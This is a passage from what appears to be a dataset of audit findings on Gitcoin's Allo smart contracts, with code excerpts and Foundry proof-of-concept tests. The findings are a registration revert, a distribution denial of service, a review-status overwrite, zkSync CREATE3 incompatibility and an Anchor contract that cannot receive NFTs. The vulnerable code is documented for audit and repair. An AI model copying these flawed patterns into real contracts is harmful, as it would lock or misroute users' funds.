"RFPSimpleStrategy");\\n\\n vm.prank(pool_admin());\\n poolId = allo().createPoolWithCustomStrategy(\\n poolProfile_id(),\\n address(custom_strategy),\\n abi.encode(maxBid, useRegistryAnchorTrue, metadataRequired),\\n NATIVE,\\n 0,\\n poolMetadata,\\n pool_managers()\\n );\\n //\\n // Create profile1 metadata and anchor\\n Metadata memory metadata = Metadata({protocol: 1, pointer: "metadata"});\\n address anchor = profile1_anchor();\\n bytes memory data = abi.encode(anchor, 1e18, metadata);\\n //\\n // Profile1 member registers to the pool but it reverted by RECIPIENT_ERROR\\n vm.startPrank(address(profile1_member1()));\\n vm.expectRevert(abi.encodeWithSelector(RECIPIENT_ERROR.selector, address(anchor)));\\n allo().registerRecipient(poolId, data);\\n }\\n```\\n
When the strategy is using `useRegistryAncho=true`, get the `recipientAddress` from the data:\\n```\\n function _registerRecipient(bytes memory _data, address _sender)\\n internal\\n override\\n onlyActivePool\\n returns (address recipientId)\\n {\\n bool isUsingRegistryAnchor;\\n address recipientAddress;\\n address registryAnchor;\\n uint256 proposalBid;\\n Metadata memory metadata;\\n\\n // Decode '_data' depending on the 'useRegistryAnchor' flag\\n if (useRegistryAnchor) {\\n /// @custom:data when 'true' // Remove the line below\\n> (address recipientId, uint256 proposalBid, Metadata metadata)\\n// Remove the line below\\n// Remove the line below\\n (recipientId, proposalBid, metadata) = abi.decode(_data, (address, uint256, Metadata));\\n// Add the line below\\n// Add the line below\\n (recipientId, recipientAddress, proposalBid, metadata) = abi.decode(_data, (address, address, uint256, Metadata));\\n\\n // If the sender is not a profile member this will revert\\n if (!_isProfileMember(recipientId, _sender)) revert UNAUTHORIZED();\\n```\\n
The pool created with a strategy using the `userRegistryAnchor=true` can not get `registrants` because `_registerRecipient()` will be reverted all the time. If the pool is funded but no one can be allocated since there is not registered recipients, the deposited funds by others may be trapped because those are not distributed since there are not `registrants`.
```\\n// File: test/foundry/strategies/RFPSimpleStrategy.t.sol:RFPSimpleStrategyTest\\n// $ forge test --match-test "test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue" -vvv\\n//\\n function test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue() public {\\n // The registerRecipient() function does not work then the strategy was created using the\\n // useRegistryAnchor = true.\\n //\\n bool useRegistryAnchorTrue = true;\\n RFPSimpleStrategy custom_strategy = new RFPSimpleStrategy(address(allo()), "RFPSimpleStrategy");\\n\\n vm.prank(pool_admin());\\n poolId = allo().createPoolWithCustomStrategy(\\n poolProfile_id(),\\n address(custom_strategy),\\n abi.encode(maxBid, useRegistryAnchorTrue, metadataRequired),\\n NATIVE,\\n 0,\\n poolMetadata,\\n pool_managers()\\n );\\n //\\n // Create profile1 metadata and anchor\\n Metadata memory metadata = Metadata({protocol: 1, pointer: "metadata"});\\n address anchor = profile1_anchor();\\n bytes memory data = abi.encode(anchor, 1e18, metadata);\\n //\\n // Profile1 member registers to the pool but it reverted by RECIPIENT_ERROR\\n vm.startPrank(address(profile1_member1()));\\n vm.expectRevert(abi.encodeWithSelector(RECIPIENT_ERROR.selector, address(anchor)));\\n allo().registerRecipient(poolId, data);\\n }\\n```\\n
`_distribute()` function in RFPSimpleStrategy contract has wrong requirement causing DOS
medium
The function _distribute():\\n```\\n function _distribute(address[] memory, bytes memory, address _sender)\\n internal\\n virtual\\n override\\n onlyInactivePool\\n onlyPoolManager(_sender)\\n {\\n // rest of code\\n\\n IAllo.Pool memory pool = allo.getPool(poolId);\\n Milestone storage milestone = milestones[upcomingMilestone];\\n Recipient memory recipient = _recipients[acceptedRecipientId];\\n\\n if (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n\\n uint256 amount = (recipient.proposalBid * milestone.amountPercentage) / 1e18;\\n\\n poolAmount -= amount;//<@@ NOTICE the poolAmount get decrease over time\\n\\n _transferAmount(pool.token, recipient.recipientAddress, amount);\\n\\n // rest of code\\n }\\n```\\n\\nLet's suppose this scenario:\\nPool manager funding the contract with 100 token, making `poolAmount` variable equal to 100\\nPool manager set 5 equal milestones with 20% each\\nSelected recipient's proposal bid is 100, making `recipients[acceptedRecipientId].proposalBid` variable equal to 100\\nAfter milestone 1 done, pool manager pays recipient using `distribute()`. Value of variables after: `poolAmount = 80 ,recipients[acceptedRecipientId].proposalBid = 100`\\nAfter milestone 2 done, pool manager will get DOS trying to pay recipient using `distribute()` because of this line:\\n```\\nif (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n```\\n
```\\n- if (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n+ if ((recipient.proposalBid * milestone.amountPercentage) / 1e18 > poolAmount) revert NOT_ENOUGH_FUNDS();\\n```\\n
This behaviour will cause DOS when distributing the 2nd milestone or higher
```\\n function _distribute(address[] memory, bytes memory, address _sender)\\n internal\\n virtual\\n override\\n onlyInactivePool\\n onlyPoolManager(_sender)\\n {\\n // rest of code\\n\\n IAllo.Pool memory pool = allo.getPool(poolId);\\n Milestone storage milestone = milestones[upcomingMilestone];\\n Recipient memory recipient = _recipients[acceptedRecipientId];\\n\\n if (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n\\n uint256 amount = (recipient.proposalBid * milestone.amountPercentage) / 1e18;\\n\\n poolAmount -= amount;//<@@ NOTICE the poolAmount get decrease over time\\n\\n _transferAmount(pool.token, recipient.recipientAddress, amount);\\n\\n // rest of code\\n }\\n```\\n
`QVBaseStrategy::reviewRecipients()` doesn't check if the recipient is already accepted or rejected, and overwrites the current status
medium
In the QV strategy contracts, recipients register themselves and wait for a pool manager to accept the registration. Pool managers can accept or reject recipients with the `reviewRecipients()` function. There is also a threshold (reviewThreshold) for recipients to be accepted. For example, if the `reviewThreshold` is 2, a pending recipient gets accepted when two managers accept this recipient and the `recipientStatus` is updated.\\nHowever, `QVBaseStrategy::reviewRecipients()` function doesn't check the recipient's current status. This one alone may not be an issue because managers may want to change the status of the recipient etc.\\nBut on top of that, the function also doesn't take the previous review counts into account when updating the status, and overwrites the status immediately after reaching the threshold. I'll share a scenario later about this below.\\n```\\nfile: QVBaseStrategy.sol\\n function reviewRecipients(address[] calldata _recipientIds, Status[] calldata _recipientStatuses)\\n external\\n virtual\\n onlyPoolManager(msg.sender)\\n onlyActiveRegistration\\n {\\n // make sure the arrays are the same length\\n uint256 recipientLength = _recipientIds.length;\\n if (recipientLength != _recipientStatuses.length) revert INVALID();\\n\\n for (uint256 i; i < recipientLength;) {\\n Status recipientStatus = _recipientStatuses[i];\\n address recipientId = _recipientIds[i];\\n\\n // if the status is none or appealed then revert\\n if (recipientStatus == Status.None || recipientStatus == Status.Appealed) { //@audit these are the input parameter statuse not the recipient's status.\\n revert RECIPIENT_ERROR(recipientId);\\n }\\n\\n reviewsByStatus[recipientId][recipientStatus]++;\\n\\n --> if (reviewsByStatus[recipientId][recipientStatus] >= reviewThreshold) { //@audit recipientStatus is updated right after the threshold is reached. It can overwrite if the status is already set.\\n Recipient storage recipient = recipients[recipientId];\\n recipient.recipientStatus = recipientStatus;\\n\\n emit RecipientStatusUpdated(recipientId, recipientStatus, address(0));\\n }\\n\\n emit Reviewed(recipientId, recipientStatus, msg.sender);\\n\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n\\nAs I mentioned above, the function updates the `recipientStatus` immediately after reaching the threshold. Here is a scenario of why this might be an issue.\\nExample Scenario\\nThe pool has 5 managers and the `reviewThreshold` is 2.\\nThe first manager rejects the recipient\\nThe second manager accepts the recipient\\nThe third manager rejects the recipient. -> `recipientStatus` updated -> `status = REJECTED`\\nThe fourth manager rejects the recipient -> status still `REJECTED`\\nThe last manager accepts the recipient ->recipientStatus updated again -> `status = ACCEPTED`\\n3 managers rejected and 2 managers accepted the recipient but the recipient status is overwritten without checking the recipient's previous status and is ACCEPTED now.\\nCoded PoC\\nYou can prove the scenario above with the PoC. You can use the protocol's own setup for this.\\n- Copy the snippet below and paste it into the `QVBaseStrategy.t.sol` test file.\\n- Run forge test `--match-test test_reviewRecipient_reviewTreshold_OverwriteTheLastOne`\\n```\\n//@audit More managers rejected but the recipient is accepted\\n function test_reviewRecipient_reviewTreshold_OverwriteTheLastOne() public virtual {\\n address recipientId = __register_recipient();\\n\\n // Create rejection status\\n address[] memory recipientIds = new address[](1);\\n recipientIds[0] = recipientId;\\n IStrategy.Status[] memory Statuses = new IStrategy.Status[](1);\\n Statuses[0] = IStrategy.Status.Rejected;\\n\\n // Reject three times with different managers\\n vm.startPrank(pool_manager1());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n vm.startPrank(pool_manager2());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n vm.startPrank(pool_manager3());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n // Three managers rejected. Status will be rejected.\\n assertEq(uint8(qvStrategy().getRecipientStatus(recipientId)), uint8(IStrategy.Status.Rejected));\\n assertEq(qvStrategy().reviewsByStatus(recipientId, IStrategy.Status.Rejected), 3);\\n\\n // Accept two times after three rejections\\n Statuses[0] = IStrategy.Status.Accepted;\\n vm.startPrank(pool_admin());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n vm.startPrank(pool_manager4());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n // 3 Rejected, 2 Accepted, but status is Accepted because it overwrites right after passing threshold.\\n assertEq(uint8(qvStrategy().getRecipientStatus(recipientId)), uint8(IStrategy.Status.Accepted));\\n assertEq(qvStrategy().reviewsByStatus(recipientId, IStrategy.Status.Rejected), 3);\\n assertEq(qvStrategy().reviewsByStatus(recipientId, IStrategy.Status.Accepted), 2);\\n }\\n```\\n\\nYou can find the test results below:\\n```\\nRunning 1 test for test/foundry/strategies/QVSimpleStrategy.t.sol:QVSimpleStrategyTest\\n[PASS] test_reviewRecipient_reviewTreshold_OverwriteTheLastOne() (gas: 249604)\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 10.92ms\\n```\\n
Checking the review counts before updating the state might be helpful to mitigate this issue
Recipient status might be overwritten with less review counts.
```\\nfile: QVBaseStrategy.sol\\n function reviewRecipients(address[] calldata _recipientIds, Status[] calldata _recipientStatuses)\\n external\\n virtual\\n onlyPoolManager(msg.sender)\\n onlyActiveRegistration\\n {\\n // make sure the arrays are the same length\\n uint256 recipientLength = _recipientIds.length;\\n if (recipientLength != _recipientStatuses.length) revert INVALID();\\n\\n for (uint256 i; i < recipientLength;) {\\n Status recipientStatus = _recipientStatuses[i];\\n address recipientId = _recipientIds[i];\\n\\n // if the status is none or appealed then revert\\n if (recipientStatus == Status.None || recipientStatus == Status.Appealed) { //@audit these are the input parameter statuse not the recipient's status.\\n revert RECIPIENT_ERROR(recipientId);\\n }\\n\\n reviewsByStatus[recipientId][recipientStatus]++;\\n\\n --> if (reviewsByStatus[recipientId][recipientStatus] >= reviewThreshold) { //@audit recipientStatus is updated right after the threshold is reached. It can overwrite if the status is already set.\\n Recipient storage recipient = recipients[recipientId];\\n recipient.recipientStatus = recipientStatus;\\n\\n emit RecipientStatusUpdated(recipientId, recipientStatus, address(0));\\n }\\n\\n emit Reviewed(recipientId, recipientStatus, msg.sender);\\n\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n
CREATE3 is not available in the zkSync Era.
medium
The zkSync Era docs explain how it differs from Ethereum.\\nPOC:\\n```\\n// SPDX-License-Identifier: Unlicensed\\npragma solidity ^0.8.0;\\n\\nimport "./MiniContract.sol";\\nimport "./CREATE3.sol";\\n\\ncontract DeployTest {\\n address public deployedAddress;\\n event Deployed(address);\\n \\n function generateContract() public returns(address, address) {\\n bytes32 salt = keccak256("SALT");\\n\\n address preCalculatedAddress = CREATE3.getDeployed(salt);\\n\\n // check if the contract has already been deployed by checking code size of address\\n bytes memory creationCode = abi.encodePacked(type(MiniContract).creationCode, abi.encode(777));\\n\\n // Use CREATE3 to deploy the anchor contract\\n address deployed = CREATE3.deploy(salt, creationCode, 0);\\n return (preCalculatedAddress, deployed);\\n }\\n}\\n```\\n\\nAlso, the logic to compute the address of Create2 is different from Ethereum, as shown below, so the CREATE3 library cannot be used as it is.\\nThis cause registry returns an incorrect `preCalculatedAddress`, causing the anchor to be registered to an address that is not the actual deployed address.\\n```\\naddress ⇒ keccak256( \\n keccak256("zksyncCreate2") ⇒ 0x2020dba91b30cc0006188af794c2fb30dd8520db7e2c088b7fc7c103c00ca494, \\n sender, \\n salt, \\n keccak256(bytecode), \\n keccak256(constructorInput)\\n ) \\n```\\n
This can be solved by implementing CREATE2 directly instead of CREATE3 and using `type(Anchor).creationCode`. Also, the compute address logic needs to be modified for zkSync.
`generateAnchor` doesn't work, so user can't do anything related to anchor.
```\\n// SPDX-License-Identifier: Unlicensed\\npragma solidity ^0.8.0;\\n\\nimport "./MiniContract.sol";\\nimport "./CREATE3.sol";\\n\\ncontract DeployTest {\\n address public deployedAddress;\\n event Deployed(address);\\n \\n function generateContract() public returns(address, address) {\\n bytes32 salt = keccak256("SALT");\\n\\n address preCalculatedAddress = CREATE3.getDeployed(salt);\\n\\n // check if the contract has already been deployed by checking code size of address\\n bytes memory creationCode = abi.encodePacked(type(MiniContract).creationCode, abi.encode(777));\\n\\n // Use CREATE3 to deploy the anchor contract\\n address deployed = CREATE3.deploy(salt, creationCode, 0);\\n return (preCalculatedAddress, deployed);\\n }\\n}\\n```\\n
Anchor contract is unable to receive NFTs of any kind
medium
Anchor.sol essentially works like a wallet, and also attached to profile to give it extra credibility and profile owner more functionality.\\nAs intended this contract will receive nfts, from different strategies and protocols. However, as it is currently implemented thee contracts will not be able to receive NFTs sent with safeTransferFrom(), because they do not implement the necessary functions to safely receive these tokens..\\nWhile in many cases such a situation would be Medium severity, looking at these wallets will be used could lead to more serious consequences. For example, having an anchor that is entitled to high value NFTs but is not able to receive them is clearly a loss of funds risk, and a High severity issue.\\nimplement the onERC721Received() and onERC1155Received() functions in following code:\\n```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.19;\\n\\n// Core Contracts\\nimport {Registry} from "./Registry.sol";\\n\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⢿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⡟⠘⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⣾⣿⣿⣿⣿⣾⠻⣿⣿⣿⣿⣿⣿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⡿⠀⠀⠸⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⢀⣠⣴⣴⣶⣶⣶⣦⣦⣀⡀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⣴⣿⣿⣿⣿⣿⣿⡿⠃⠀⠙⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠁⠀⠀⠀⢻⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠘⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⠃⠀⠀⠀⠀⠈⢿⣿⣿⣿⣆⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⣰⣿⣿⣿⡿⠋⠁⠀⠀⠈⠘⠹⣿⣿⣿⣿⣆⠀⠀⠀\\n// ⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡀⠀⠀\\n// ⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣟⠀⡀⢀⠀⡀⢀⠀⡀⢈⢿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⡇⠀⠀\\n// ⠀⠀⣠⣿⣿⣿⣿⣿⣿⡿⠋⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⡿⢿⠿⠿⠿⠿⠿⠿⠿⠿⠿⢿⣿⣿⣿⣷⡀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠸⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠂⠀⠀\\n// ⠀⠀⠙⠛⠿⠻⠻⠛⠉⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣧⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⢻⣿⣿⣿⣷⣀⢀⠀⠀⠀⡀⣰⣾⣿⣿⣿⠏⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣧⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠹⢿⣿⣿⣿⣿⣾⣾⣷⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠙⠋⠛⠙⠋⠛⠙⠋⠛⠙⠋⠃⠀⠀⠀⠀⠀⠀⠀⠀⠠⠿⠻⠟⠿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⠟⠿⠟⠿⠆⠀⠸⠿⠿⠟⠯⠀⠀⠀⠸⠿⠿⠿⠏⠀⠀⠀⠀⠀⠈⠉⠻⠻⡿⣿⢿⡿⡿⠿⠛⠁⠀⠀⠀⠀⠀⠀\\n// allo.gitcoin.co\\n\\n/// @title Anchor contract\\n/// @author @thelostone-mc <aditya@gitcoin.co>, @0xKurt <kurt@gitcoin.co>, @codenamejason <jason@gitcoin.co>, @0xZakk <zakk@gitcoin.co>, @nfrgosselin <nate@gitcoin.co>\\n/// @notice Anchors are associated with profiles and are accessible exclusively by the profile owner. This contract ensures secure\\n/// and authorized interaction with external addresses, enhancing the capabilities of profiles and enabling controlled\\n/// execution of operations. The contract leverages the `Registry` contract for ownership verification and access control.\\ncontract Anchor {\\n /// ==========================\\n /// === Storage Variables ====\\n /// ==========================\\n\\n /// @notice The registry contract on any given network/chain\\n Registry public immutable registry;\\n\\n /// @notice The profileId of the allowed profile to execute calls\\n bytes32 public immutable profileId;\\n\\n /// ==========================\\n /// ======== Errors ==========\\n /// ==========================\\n\\n /// @notice Throws when the caller is not the owner of the profile\\n error UNAUTHORIZED();\\n\\n /// @notice Throws when the call to the target address fails\\n error CALL_FAILED();\\n\\n /// ==========================\\n /// ======= Constructor ======\\n /// ==========================\\n\\n /// @notice Constructor\\n /// @dev We create an instance of the 'Registry' contract using the 'msg.sender' and set the profileId.\\n /// @param _profileId The ID of the allowed profile to execute calls\\n constructor(bytes32 _profileId) {\\n registry = Registry(msg.sender);\\n profileId = _profileId;\\n }\\n\\n /// ==========================\\n /// ======== External ========\\n /// ==========================\\n\\n /// @notice Execute a call to a target address\\n /// @dev 'msg.sender' must be profile owner\\n /// @param _target The target address to call\\n /// @param _value The amount of native token to send\\n /// @param _data The data to send to the target address\\n /// @return Data returned from the target address\\n function execute(address _target, uint256 _value, bytes memory _data) external returns (bytes memory) {\\n // Check if the caller is the owner of the profile and revert if not\\n if (!registry.isOwnerOfProfile(profileId, msg.sender)) revert UNAUTHORIZED();\\n\\n // Check if the target address is the zero address and revert if it is\\n if (_target == address(0)) revert CALL_FAILED();\\n\\n // Call the target address and return the data\\n (bool success, bytes memory data) = _target.call{value: _value}(_data);\\n\\n // Check if the call was successful and revert if not\\n if (!success) revert CALL_FAILED();\\n\\n return data;\\n }\\n\\n /// @notice This contract should be able to receive native token\\n receive() external payable {}\\n}\\n```\\n
implement the onERC721Received() and onERC1155Received() functions
Any time an ERC721 or ERC1155 is attempted to be transferred with safeTransferFrom() or minted with safeMint(), the call will fail.
```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.19;\\n\\n// Core Contracts\\nimport {Registry} from "./Registry.sol";\\n\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⢿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⡟⠘⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⣾⣿⣿⣿⣿⣾⠻⣿⣿⣿⣿⣿⣿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⡿⠀⠀⠸⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⢀⣠⣴⣴⣶⣶⣶⣦⣦⣀⡀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⣴⣿⣿⣿⣿⣿⣿⡿⠃⠀⠙⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠁⠀⠀⠀⢻⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠘⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⠃⠀⠀⠀⠀⠈⢿⣿⣿⣿⣆⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⣰⣿⣿⣿⡿⠋⠁⠀⠀⠈⠘⠹⣿⣿⣿⣿⣆⠀⠀⠀\\n// ⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡀⠀⠀\\n// 